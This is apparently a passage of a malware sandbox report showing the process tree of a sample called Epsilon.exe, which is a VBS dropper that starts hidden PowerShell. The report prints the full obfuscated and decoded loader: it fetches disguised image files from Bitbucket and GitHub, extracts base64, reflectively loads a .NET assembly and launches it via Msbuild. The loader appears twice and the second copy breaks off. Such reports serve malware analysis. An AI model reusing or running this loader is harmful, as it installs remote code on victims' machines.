  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:4668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:1
  2⤵
  PID:3320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1860,538352638867761355,1431812443115449934,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
  2⤵
  PID:4052

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3044

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2152

C:\Users\Admin\Downloads\Epsilon\Epsilon.exe
"C:\Users\Admin\Downloads\Epsilon\Epsilon.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1312
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c 677ebc888e619.vbs
  2⤵
  - Modifies registry class
  PID:4832
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\677ebc888e619.vbs"
    3⤵
    PID:2012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBT$HU$YgBz$HQ$cgBp$G4$Zw$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$s$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$g$C$$J$B0$GU$e$B0$C$$PQ$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$9$C$$RwBl$HQ$LQBD$G8$bQBw$HI$ZQBz$HM$ZQBk$EI$eQB0$GU$QQBy$HI$YQB5$C$$LQBi$Hk$d$Bl$EE$cgBy$GE$eQ$g$CQ$ZQBu$GM$V$Bl$Hg$d$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$GE$YQBh$GE$YQBh$HM$Z$Bt$GU$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$Jw$g$HQ$e$B0$C4$awBG$GM$Z$Bp$G0$YQ$v$HM$Z$Bh$G8$b$Bu$Hc$bwBk$C8$cgBl$Hc$cgB3$GU$dQ$v$HQ$ZQBy$HI$dwBx$GU$dw$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5052
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.kFcdima/sdaolnwod/rewrweu/terrwqew/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1852
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:4840
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
        6⤵
        
        PID:4884

C:\Users\Admin\Downloads\Epsilon\Epsilon.exe
"C:\Users\Admin\Downloads\Epsilon\Epsilon.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3428
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c 677ebc888e619.vbs
  2⤵
  - Modifies registry class
  PID:2964
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\677ebc888e619.vbs"
    3⤵
    PID:2452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YgBh$HM$ZQ$2$DQ$T$Bl$G4$ZwB0$Gg$I$$9$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bi$GE$cwBl$DY$N$BD$G8$bQBt$GE$bgBk$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBT$HU$YgBz$HQ$cgBp$G4$Zw$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$s$C$$J$Bi$GE$cwBl$DY$N$BM$GU$bgBn$HQ$a$$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$YwBv$G0$bQBh$G4$Z$BC$Hk$d$Bl$HM$I$$9$C$$WwBT$Hk$cwB0$GU$bQ$u$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$RgBy$G8$bQBC$GE$cwBl$DY$N$BT$HQ$cgBp$G4$Zw$o$CQ$YgBh$HM$ZQ$2$DQ$QwBv$G0$bQBh$G4$Z$$p$Ds$I$$g$C$$J$B0$GU$e$B0$C$$PQ$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$Ds$I$$k$Gw$bwBh$GQ$ZQBk$EE$cwBz$GU$bQBi$Gw$eQ$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$UgBl$GY$b$Bl$GM$d$Bp$G8$bg$u$EE$cwBz$GU$bQBi$Gw$eQBd$Do$OgBM$G8$YQBk$Cg$J$Bj$G8$bQBt$GE$bgBk$EI$eQB0$GU$cw$p$Ds$I$$g$CQ$RQBu$GM$bwBk$GU$Z$BU$GU$e$B0$C$$PQBb$EM$bwBu$HY$ZQBy$HQ$XQ$6$Do$V$Bv$EI$YQBz$GU$Ng$0$FM$d$By$Gk$bgBn$Cg$J$BC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GM$bwBt$H$$cgBl$HM$cwBl$GQ$QgB5$HQ$ZQBB$HI$cgBh$Hk$I$$9$C$$RwBl$HQ$LQBD$G8$bQBw$HI$ZQBz$HM$ZQBk$EI$eQB0$GU$QQBy$HI$YQB5$C$$LQBi$Hk$d$Bl$EE$cgBy$GE$eQ$g$CQ$ZQBu$GM$V$Bl$Hg$d$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B0$Hk$c$Bl$C$$PQ$g$CQ$b$Bv$GE$Z$Bl$GQ$QQBz$HM$ZQBt$GI$b$B5$C4$RwBl$HQ$V$B5$H$$ZQ$o$Cc$d$Bl$HM$d$Bw$G8$dwBl$HI$cwBo$GU$b$Bs$C4$S$Bv$GE$YQBh$GE$YQBh$HM$Z$Bt$GU$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$BF$G4$YwBv$GQ$ZQBk$FQ$ZQB4$HQ$I$$9$Fs$QwBv$G4$dgBl$HI$d$Bd$Do$OgBU$G8$QgBh$HM$ZQ$2$DQ$UwB0$HI$aQBu$Gc$K$$k$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bt$GU$d$Bo$G8$Z$$g$D0$I$$k$HQ$eQBw$GU$LgBH$GU$d$BN$GU$d$Bo$G8$Z$$o$Cc$b$Bm$HM$ZwBl$GQ$Z$Bk$GQ$Z$Bk$GQ$YQ$n$Ck$LgBJ$G4$dgBv$Gs$ZQ$o$CQ$bgB1$Gw$b$$s$C$$WwBv$GI$agBl$GM$d$Bb$F0$XQ$g$Cg$Jw$g$HQ$e$B0$C4$awBG$GM$Z$Bp$G0$YQ$v$HM$Z$Bh$G8$b$Bu$Hc$bwBk$C8$cgBl$Hc$cgB3$GU$dQ$v$HQ$ZQBy$HI$dwBx$GU$dw$v$Gc$cgBv$C4$d$Bl$Gs$YwB1$GI$d$Bp$GI$Jw$s$C$$Jw$w$Cc$L$$g$Cc$UwB0$GE$cgB0$HU$c$BO$GE$bQBl$Cc$L$$g$Cc$TQBz$GI$dQBp$Gw$Z$$n$Cw$I$$n$D$$Jw$p$Ck$fQB9$$==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3520
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = 